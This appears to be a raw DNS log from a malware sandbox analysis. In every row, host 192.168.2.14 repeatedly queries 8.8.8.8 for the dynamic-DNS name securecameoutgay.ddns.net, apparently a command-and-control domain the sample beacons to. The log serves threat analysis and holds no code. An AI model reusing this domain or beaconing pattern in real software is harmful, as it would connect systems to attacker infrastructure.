                                                    Oct 12, 2024 23:06:11.099225044 CEST192.168.2.148.8.8.80x4f6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.105541945 CEST192.168.2.148.8.8.80x4f6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.112225056 CEST192.168.2.148.8.8.80x4f6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.119014025 CEST192.168.2.148.8.8.80xaac8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.125463009 CEST192.168.2.148.8.8.80xaac8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.140460968 CEST192.168.2.148.8.8.80xaac8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.146646976 CEST192.168.2.148.8.8.80xaac8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.153393030 CEST192.168.2.148.8.8.80xaac8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.160914898 CEST192.168.2.148.8.8.80x8b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.167412996 CEST192.168.2.148.8.8.80x8b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.174055099 CEST192.168.2.148.8.8.80x8b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.180493116 CEST192.168.2.148.8.8.80x8b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.186883926 CEST192.168.2.148.8.8.80x8b3dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.193351984 CEST192.168.2.148.8.8.80x46efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.199973106 CEST192.168.2.148.8.8.80x46efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.206631899 CEST192.168.2.148.8.8.80x46efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.213196993 CEST192.168.2.148.8.8.80x46efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.220035076 CEST192.168.2.148.8.8.80x46efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.226721048 CEST192.168.2.148.8.8.80x231fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.233206034 CEST192.168.2.148.8.8.80x231fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.239655972 CEST192.168.2.148.8.8.80x231fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.247641087 CEST192.168.2.148.8.8.80x231fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.254795074 CEST192.168.2.148.8.8.80x231fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.261425972 CEST192.168.2.148.8.8.80xb7f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.268134117 CEST192.168.2.148.8.8.80xb7f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.274755955 CEST192.168.2.148.8.8.80xb7f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.281649113 CEST192.168.2.148.8.8.80xb7f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.288260937 CEST192.168.2.148.8.8.80xb7f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.294953108 CEST192.168.2.148.8.8.80xa2e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.301662922 CEST192.168.2.148.8.8.80xa2e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.308398008 CEST192.168.2.148.8.8.80xa2e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.315258980 CEST192.168.2.148.8.8.80xa2e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.321753979 CEST192.168.2.148.8.8.80xa2e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.328350067 CEST192.168.2.148.8.8.80xe314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.334952116 CEST192.168.2.148.8.8.80xe314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.341886044 CEST192.168.2.148.8.8.80xe314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.348436117 CEST192.168.2.148.8.8.80xe314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.354902983 CEST192.168.2.148.8.8.80xe314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.361581087 CEST192.168.2.148.8.8.80x716cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.368037939 CEST192.168.2.148.8.8.80x716cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.374291897 CEST192.168.2.148.8.8.80x716cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.380848885 CEST192.168.2.148.8.8.80x716cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.389313936 CEST192.168.2.148.8.8.80x716cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.395700932 CEST192.168.2.148.8.8.80xc1a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.402585983 CEST192.168.2.148.8.8.80xc1a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.409498930 CEST192.168.2.148.8.8.80xc1a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.416344881 CEST192.168.2.148.8.8.80xc1a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.423310995 CEST192.168.2.148.8.8.80xc1a0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.430022001 CEST192.168.2.148.8.8.80xfe29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.436554909 CEST192.168.2.148.8.8.80xfe29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.443341017 CEST192.168.2.148.8.8.80xfe29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.449930906 CEST192.168.2.148.8.8.80xfe29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.456412077 CEST192.168.2.148.8.8.80xfe29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.463263035 CEST192.168.2.148.8.8.80xa2fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.469875097 CEST192.168.2.148.8.8.80xa2fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.476962090 CEST192.168.2.148.8.8.80xa2fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.483304024 CEST192.168.2.148.8.8.80xa2fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.489656925 CEST192.168.2.148.8.8.80xa2fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.496273041 CEST192.168.2.148.8.8.80x17cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.502928972 CEST192.168.2.148.8.8.80x17cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.510385990 CEST192.168.2.148.8.8.80x17cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.517148018 CEST192.168.2.148.8.8.80x17cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.523658037 CEST192.168.2.148.8.8.80x17cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.530203104 CEST192.168.2.148.8.8.80x16e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.536842108 CEST192.168.2.148.8.8.80x16e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.543648958 CEST192.168.2.148.8.8.80x16e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.550538063 CEST192.168.2.148.8.8.80x16e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.557050943 CEST192.168.2.148.8.8.80x16e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.563720942 CEST192.168.2.148.8.8.80x4772Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.570879936 CEST192.168.2.148.8.8.80x4772Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.578075886 CEST192.168.2.148.8.8.80x4772Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.584585905 CEST192.168.2.148.8.8.80x4772Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.591124058 CEST192.168.2.148.8.8.80x4772Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.597644091 CEST192.168.2.148.8.8.80x1333Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.604182959 CEST192.168.2.148.8.8.80x1333Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.610879898 CEST192.168.2.148.8.8.80x1333Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.617543936 CEST192.168.2.148.8.8.80x1333Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.624288082 CEST192.168.2.148.8.8.80x1333Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.631269932 CEST192.168.2.148.8.8.80xac3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.638451099 CEST192.168.2.148.8.8.80xac3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.645772934 CEST192.168.2.148.8.8.80xac3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.652105093 CEST192.168.2.148.8.8.80xac3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.659629107 CEST192.168.2.148.8.8.80xac3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.666419029 CEST192.168.2.148.8.8.80xde23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.673487902 CEST192.168.2.148.8.8.80xde23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.680048943 CEST192.168.2.148.8.8.80xde23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.687417030 CEST192.168.2.148.8.8.80xde23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.694008112 CEST192.168.2.148.8.8.80xde23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.700618029 CEST192.168.2.148.8.8.80xa174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.707326889 CEST192.168.2.148.8.8.80xa174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.714343071 CEST192.168.2.148.8.8.80xa174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.722016096 CEST192.168.2.148.8.8.80xa174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.728719950 CEST192.168.2.148.8.8.80xa174Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.735173941 CEST192.168.2.148.8.8.80x8dc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.743757963 CEST192.168.2.148.8.8.80x8dc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.750747919 CEST192.168.2.148.8.8.80x8dc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.757344961 CEST192.168.2.148.8.8.80x8dc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.764440060 CEST192.168.2.148.8.8.80x8dc8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.771070957 CEST192.168.2.148.8.8.80x8d79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.778032064 CEST192.168.2.148.8.8.80x8d79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.785269976 CEST192.168.2.148.8.8.80x8d79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.791973114 CEST192.168.2.148.8.8.80x8d79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.798469067 CEST192.168.2.148.8.8.80x8d79Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.805538893 CEST192.168.2.148.8.8.80xb41eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.812572956 CEST192.168.2.148.8.8.80xb41eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.819055080 CEST192.168.2.148.8.8.80xb41eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.825788021 CEST192.168.2.148.8.8.80xb41eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.832390070 CEST192.168.2.148.8.8.80xb41eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.839185953 CEST192.168.2.148.8.8.80x3b46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.848047018 CEST192.168.2.148.8.8.80x3b46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.860207081 CEST192.168.2.148.8.8.80x3b46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.872687101 CEST192.168.2.148.8.8.80x3b46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.885452032 CEST192.168.2.148.8.8.80x3b46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.897171974 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.904253960 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.912398100 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.918972969 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.925906897 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.932558060 CEST192.168.2.148.8.8.80x226fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.939452887 CEST192.168.2.148.8.8.80x226fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.945993900 CEST192.168.2.148.8.8.80x226fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.952518940 CEST192.168.2.148.8.8.80x226fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.959089041 CEST192.168.2.148.8.8.80x226fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.965835094 CEST192.168.2.148.8.8.80xfb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.972467899 CEST192.168.2.148.8.8.80xfb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.979119062 CEST192.168.2.148.8.8.80xfb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.986114979 CEST192.168.2.148.8.8.80xfb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.992727995 CEST192.168.2.148.8.8.80xfb2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:11.999567032 CEST192.168.2.148.8.8.80x9129Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.006724119 CEST192.168.2.148.8.8.80x9129Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.013180017 CEST192.168.2.148.8.8.80x9129Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.020040035 CEST192.168.2.148.8.8.80x9129Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.026866913 CEST192.168.2.148.8.8.80x9129Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.033572912 CEST192.168.2.148.8.8.80x15a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.039905071 CEST192.168.2.148.8.8.80x15a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.047246933 CEST192.168.2.148.8.8.80x15a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.053793907 CEST192.168.2.148.8.8.80x15a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.060564041 CEST192.168.2.148.8.8.80x15a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.067531109 CEST192.168.2.148.8.8.80x4803Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.074296951 CEST192.168.2.148.8.8.80x4803Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.080779076 CEST192.168.2.148.8.8.80x4803Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.087737083 CEST192.168.2.148.8.8.80x4803Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.094103098 CEST192.168.2.148.8.8.80x4803Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.100637913 CEST192.168.2.148.8.8.80x6900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.107743979 CEST192.168.2.148.8.8.80x6900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.114308119 CEST192.168.2.148.8.8.80x6900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.120666981 CEST192.168.2.148.8.8.80x6900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.127412081 CEST192.168.2.148.8.8.80x6900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.134141922 CEST192.168.2.148.8.8.80x392eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.140669107 CEST192.168.2.148.8.8.80x392eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.147064924 CEST192.168.2.148.8.8.80x392eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.153800964 CEST192.168.2.148.8.8.80x392eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.160281897 CEST192.168.2.148.8.8.80x392eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.172753096 CEST192.168.2.148.8.8.80x6adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.180366993 CEST192.168.2.148.8.8.80x6adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.186965942 CEST192.168.2.148.8.8.80x6adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.193692923 CEST192.168.2.148.8.8.80x6adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.200217009 CEST192.168.2.148.8.8.80x6adfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.206793070 CEST192.168.2.148.8.8.80x7c9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.213223934 CEST192.168.2.148.8.8.80x7c9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.220057011 CEST192.168.2.148.8.8.80x7c9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.226510048 CEST192.168.2.148.8.8.80x7c9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.233192921 CEST192.168.2.148.8.8.80x7c9eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.239852905 CEST192.168.2.148.8.8.80x5045Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.246701002 CEST192.168.2.148.8.8.80x5045Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.254262924 CEST192.168.2.148.8.8.80x5045Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.261234999 CEST192.168.2.148.8.8.80x5045Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.267870903 CEST192.168.2.148.8.8.80x5045Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.274754047 CEST192.168.2.148.8.8.80x4698Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.281829119 CEST192.168.2.148.8.8.80x4698Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.288691044 CEST192.168.2.148.8.8.80x4698Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.296084881 CEST192.168.2.148.8.8.80x4698Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.302714109 CEST192.168.2.148.8.8.80x4698Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.309396982 CEST192.168.2.148.8.8.80xbd30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.316247940 CEST192.168.2.148.8.8.80xbd30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.322918892 CEST192.168.2.148.8.8.80xbd30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.330826044 CEST192.168.2.148.8.8.80xbd30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.337590933 CEST192.168.2.148.8.8.80xbd30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.344429016 CEST192.168.2.148.8.8.80x5adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.351006031 CEST192.168.2.148.8.8.80x5adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.357719898 CEST192.168.2.148.8.8.80x5adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.364439964 CEST192.168.2.148.8.8.80x5adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.372332096 CEST192.168.2.148.8.8.80x5adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.378937960 CEST192.168.2.148.8.8.80x46aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.385473013 CEST192.168.2.148.8.8.80x46aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.392657042 CEST192.168.2.148.8.8.80x46aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.400552034 CEST192.168.2.148.8.8.80x46aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.407361031 CEST192.168.2.148.8.8.80x46aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
